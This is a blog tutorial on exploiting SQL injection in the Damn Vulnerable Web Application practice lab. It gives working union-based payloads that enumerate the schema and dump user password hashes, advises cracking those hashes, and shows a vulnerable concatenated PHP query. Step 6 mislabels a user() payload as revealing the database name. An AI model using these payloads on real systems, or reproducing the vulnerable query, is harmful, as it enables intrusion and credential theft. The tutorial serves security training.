DVWA SQL Injection Exploitation Explained (Step-by-Step)

Kali Linux, Ethical hacking, Security

What is SQL injection (SQLi)?

SQL injection is one of the most common attacks used by hackers to exploit any SQL database-driven web application. It’s a technique where SQL code/statements are inserted in the execution field with an aim of either altering the database contents, dumping useful database contents to the hacker, cause repudiation issues, spoof identity, and much more.

Let’s take a simple scenario where we have a web application with a login form with username and password fields. If the developer used PHP for development, the code would look like this:

$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
$query .= " AND password = '" . $_POST['password'] . "'"; 

If a user Karen with the password ‘12345’ wanted to log in, after clicking the Submit or the Log in button, the query that would be sent to the database would look like this:

SELECT * FROM users WHERE username='Karen' AND password='12345'

If an attacker knew the username and wanted to bypass the login window, they would put something like Karen;-- in the username field. The resulting SQL query would look like this:

SELECT * FROM users WHERE username='Karen'; -- ' AND password='1111'

What the attacker has done, is adding the -- (double-dash) which comments the rest of the SQL statement. The above query will return the information entered in the password field making it easier for the attacker to bypass the login screen.


How to prevent SQL injection

The main reason that makes websites vulnerable to SQL injection attacks can be traced back to the web development stage. Some of the techniques that can be implemented to prevent SQL injection include:

  • Input validation: If the website allows user input, this input should be verified whether it’s allowed or not.
  • Parametrized queries: This is a technique where the SQL statements are precompiled and all you have to do is supply the parameters for the SQL statement to be executed.
  • Use Stored procedures
  • Use character-escaping functions
  • Avoid administrative privileges - Don't connect your application to the database using an account with root access
  • Implement a Web application firewall (WAF)

Any penetration tester who wants to get started or advance their skills in SQL injection will need a vulnerable platform to practice. There are many vulnerable applications available both for offline and online use.

In this particular tutorial, we will focus on the Damn Vulnerable Web Application (DVWA).



This tutorial expects that you have an up and running DVWA setup. If you have not yet installed DVWA on your Kali Linux system, please check out the article which gives a step-by-step guide.


Step 1: Setup DVWA for SQL Injection

After successfully installing DVWA, open your browser and enter the required URL Log in using the username “admin” and password as “password”. These are the default DVWA login credentials. After a successful login, set the DVWA security to LOW then click on SQL Injection on the left-side menu.

DVWA SQL Injection
DVWA SQL Injection


Step 2: Basic Injection

On the User ID field, enter “1” and click Submit. That is supposed to print the ID, First_name, and Surname on the screen as you can see below.

The SQL syntax being exploited here is:

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
DVWA Basic SQL Injection
DVWA Basic SQL Injection


Interestingly, when you check the URL, you will see there is an injectable parameter which is the ID. Currently, my URL looks like this:

Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That will also return the First_name and Surname of all users as follows:

ID: 2
First name: Gordon
Surname: Brown

ID: 3
First name: Hack
Surname: Me

ID: 4
First name: Pablo
Surname: Picasso

If you were executing this command directly on the DVWA database, the query for User ID 3 would look like this:

SELECT first_name, last_name FROM users WHERE user_id = '3';
SQL Injection
SQL Injection


Step 3: Always True Scenario

An advanced method to extract all the First_names and Surnames from the database would be to use the input: %' or '1'='1'

always true injection
always true injection


The percentage % sign does not equal anything and will be false. The '1'='1' query is registered as True since 1 will always equal 1. If you were executing that on a database, the query would look like this:

SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';
SQL Injection
SQL Injection


Step 4: Display Database Version

To know the database version the DVWA application is running on, enter the text below in the User ID field.

%' or 0=0 union select null, version() #

The database version will be listed under surname in the last line as shown in the image below.

Display databse version
Display database version


Step 5: Display Database User

To display the Database user who executed the PHP code powering the database, enter the text below in the USER ID field.

%' or 0=0 union select null, user() #

The Database user is listed next to the surname field in the last line as in the image below.

Display database user
Display database user


Step 6: Display Database Name

To display the database name, we will inject the SQL code below in the User ID field.

%' or 0=0 union select null, user() #

The database name is listed next to the surname field in the last line.

Display database name
Display database name


Step 7: Display all tables in information_schema

The Information Schema stores information about tables, columns, and all the other databases maintained by MySQL. To display all the tables present in the information_schema, use the text below.

%' and 1=0 union select null, table_name from information_schema.tables #
Database schema
Database schema


Step 8: Display all the user tables in information_schema

For this step, we will print all the tables that start with the prefix user as stored in the information_schema. Enter the SQL code below in the User ID.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
User tables
User tables


Step 9: Display all the columns fields in the information_schema user table

We will print all the columns present in the users’ table. This information will include column information like User_ID, first_name, last_name, user, and password. Enter the input in the User_ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Column fields
Column fields


Step 10: Display Column field contents

To display all the necessary authentication information present in the columns as stored in the information_schema, use the SQL syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Column fields contents
Column fields contents

From the image above, you can see the password was returned in its hashed format. To extract the password, copy the MD5 hash and use applications like John the Ripper to crack it. There are also sites available on the internet where you can paste the hash and if lucky, you will be able to extract the password.



From the various examples listed in this article, SQL injection proves to be a critical vulnerability that can exist in a system. Not only can attackers exploit it to reveal user or customer information, but it can also be used to corrupt the entire database thus bringing the whole system down. As of writing this post (2021), Injection is listed as the number one vulnerability in the OWASP Top 10 Vulnerabilities summary. The DVWA acts as a reliable resource for both penetration testers who want to improve their skills and web developers who want to develop systems with security in mind.


Further readings

How can SQL injections be prevented?

Views: 4,947
Deepak Prasad

Deepak Prasad

He is the founder of GoLinuxCloud and brings over a decade of expertise in Linux, Python, Go, Laravel, DevOps, Kubernetes, Git, Shell scripting, OpenShift, AWS, Networking, and Security. With extensive experience, he excels in various domains, from development to DevOps, Networking, and Security, ensuring robust and efficient solutions for diverse projects. You can connect with him on his LinkedIn profile.

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can send mail to admin@golinuxcloud.com

Thank You for your support!!

1 thought on “DVWA SQL Injection Exploitation Explained (Step-by-Step)”

Leave a Comment